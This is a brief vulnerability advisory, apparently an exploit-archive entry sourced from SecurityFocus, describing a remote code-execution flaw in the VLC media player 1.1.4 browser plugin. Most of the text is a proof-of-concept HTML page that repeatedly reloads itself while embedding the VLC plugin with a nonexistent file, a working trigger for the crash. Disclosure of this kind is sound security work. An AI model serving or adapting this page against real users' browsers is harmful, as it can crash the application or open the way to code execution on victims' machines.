source: https://www.securityfocus.com/bid/44211/info
VLC media player is prone to a remote code-execution vulnerability.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
VLC media player 1.1.4 is vulnerable; other versions may also be affected.
<html>
<body onload="setTimeout('location.reload()', 100);">
<embed type="application/x-vlc-plugin" src="NonExistantFileName.avi"></embed>
</body>
</html>
